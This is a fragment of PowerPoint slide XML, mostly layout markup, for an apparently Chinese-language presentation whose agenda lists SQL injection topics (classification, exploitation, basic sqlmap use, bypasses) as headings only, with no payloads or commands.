                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>—</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>注入</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="组合 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5BFA2E-708D-44CD-BCE8-6E5A06346764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2200938" y="4613725"/>
            <a:ext cx="3571244" cy="539178"/>
            <a:chOff x="5216889" y="3371741"/>
            <a:chExt cx="3571244" cy="539178"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="组合 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE7CC30-0029-43CF-B774-18F1BFE3DA38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5216889" y="3371741"/>
              <a:ext cx="838868" cy="539178"/>
              <a:chOff x="3896674" y="1968528"/>
              <a:chExt cx="838868" cy="539178"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24" name="椭圆 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96D1728-281E-4949-BC7A-9C040A04D9BC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="3896674" y="1968528"/>
                <a:ext cx="539178" cy="539178"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="20000">
                    <a:srgbClr val="475574">
                      <a:alpha val="76000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="77000">
                    <a:srgbClr val="F2D4AA">
                      <a:alpha val="66000"/>
                    </a:srgbClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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pc="600">
                  <a:solidFill>
                    <a:srgbClr val="034581"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="文本框 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A328E628-3112-4AFD-979D-F9CF36122F23}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3906020" y="2038062"/>
                <a:ext cx="829522" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>03.</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="矩形 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFA56A8B-1B6A-46BE-9CC6-D5CCDB06A4F9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5817448" y="3383183"/>
              <a:ext cx="2970685" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>SQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>注入的分类</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="37" name="组合 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B5EEFBF-DBBC-4B2F-9B05-DBD29754FE09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6702217" y="3474680"/>
            <a:ext cx="4266711" cy="539178"/>
            <a:chOff x="7305048" y="3910919"/>
            <a:chExt cx="4266711" cy="539178"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="组合 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44F4DED8-EED0-4B56-BCDE-1F655A668DBE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7305048" y="3910919"/>
              <a:ext cx="838868" cy="539178"/>
              <a:chOff x="3896674" y="1968528"/>
              <a:chExt cx="838868" cy="539178"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="椭圆 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7667E1D8-1544-4364-8282-9014187CC28C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="3896674" y="1968528"/>
                <a:ext cx="539178" cy="539178"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="20000">
                    <a:srgbClr val="475574">
                      <a:alpha val="76000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="77000">
                    <a:srgbClr val="F2D4AA">
                      <a:alpha val="66000"/>
                    </a:srgbClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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pc="600">
                  <a:solidFill>
                    <a:srgbClr val="034581"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28" name="文本框 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20F21F92-AFF5-425C-9DC2-CF80FA9E1F65}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3906020" y="2038062"/>
                <a:ext cx="829522" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>05.</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="矩形 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14961E59-A0D1-4219-AA93-6F7FFE1168A7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7890943" y="3933819"/>
              <a:ext cx="3680816" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" spc="600" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Sqlmap</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>的简单使用</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="组合 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93FB1EDD-89CD-4374-9CD4-8BA181E30A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6702217" y="4548045"/>
            <a:ext cx="3925271" cy="539178"/>
            <a:chOff x="7305048" y="3910919"/>
            <a:chExt cx="3925271" cy="539178"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="42" name="组合 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13334A7D-D59C-4918-A908-356DB0F9043B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7305048" y="3910919"/>
              <a:ext cx="838868" cy="539178"/>
              <a:chOff x="3896674" y="1968528"/>
              <a:chExt cx="838868" cy="539178"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="椭圆 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D27B7958-91E3-4A5E-949B-858F79D66023}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="3896674" y="1968528"/>
                <a:ext cx="539178" cy="539178"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="20000">
                    <a:srgbClr val="475574">
                      <a:alpha val="76000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="77000">
                    <a:srgbClr val="F2D4AA">
                      <a:alpha val="66000"/>
                    </a:srgbClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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pc="600">
                  <a:solidFill>
                    <a:srgbClr val="034581"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="文本框 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{369977CC-7BF9-44F7-9186-DE477F02F51A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3906020" y="2038062"/>
                <a:ext cx="829522" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>06.</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="矩形 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C53B9288-EAFD-4FB5-8210-56ED1D1ABBC9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7890943" y="3933819"/>
              <a:ext cx="3339376" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>SQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>注入</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>bypass</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="组合 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1463A5C8-14EA-46C9-9946-6F736027775B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6676735" y="2506539"/>
            <a:ext cx="3571244" cy="539178"/>
            <a:chOff x="5216889" y="3371741"/>
            <a:chExt cx="3571244" cy="539178"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="47" name="组合 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC3D2CA9-90B8-4EF4-88B3-DD8F7A72DA45}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5216889" y="3371741"/>
              <a:ext cx="838868" cy="539178"/>
              <a:chOff x="3896674" y="1968528"/>
              <a:chExt cx="838868" cy="539178"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="椭圆 48">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16E9960E-5CA6-4874-B43C-BF4753EDFE61}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="3896674" y="1968528"/>
                <a:ext cx="539178" cy="539178"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="20000">
                    <a:srgbClr val="475574">
                      <a:alpha val="76000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="77000">
                    <a:srgbClr val="F2D4AA">
                      <a:alpha val="66000"/>
                    </a:srgbClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gra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pc="600">
                  <a:solidFill>
                    <a:srgbClr val="034581"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="文本框 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BC0321F-089C-4D78-8011-BE81B50C4DFB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3906020" y="2038062"/>
                <a:ext cx="829522" cy="400110"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:cs typeface="+mn-ea"/>
                    <a:sym typeface="+mn-lt"/>
                  </a:rPr>
                  <a:t>04.</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="矩形 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39E73D00-56FD-45FA-A395-6616036877B5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5817448" y="3383183"/>
              <a:ext cx="2970685" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>SQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="475574"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>注入的利用</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1989111419"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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35DBBDC7-4137-4E62-8E8E-511EF2EA9383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE33A0B2-9575-4FD7-9EF8-9B8416576EFF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056894C6-E7D6-4D30-B4F5-E11C54893A16}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8954839D-822E-432C-ABF8-5EE9B80CE9A6}"/>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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B17FA1F-3E11-48D1-BD36-559DE6F2D38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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF34843-E312-40D6-966C-3D17A34E60A9}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E251E78C-FF33-4EA5-8ECB-BA7F83972A9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1434302" y="793451"/>
            <a:ext cx="1972090" cy="2645659"/>
            <a:chOff x="1404892" y="1201756"/>
            <a:chExt cx="3448463" cy="4626288"/>
          </a:xfrm>
        </p:grpSpPr>
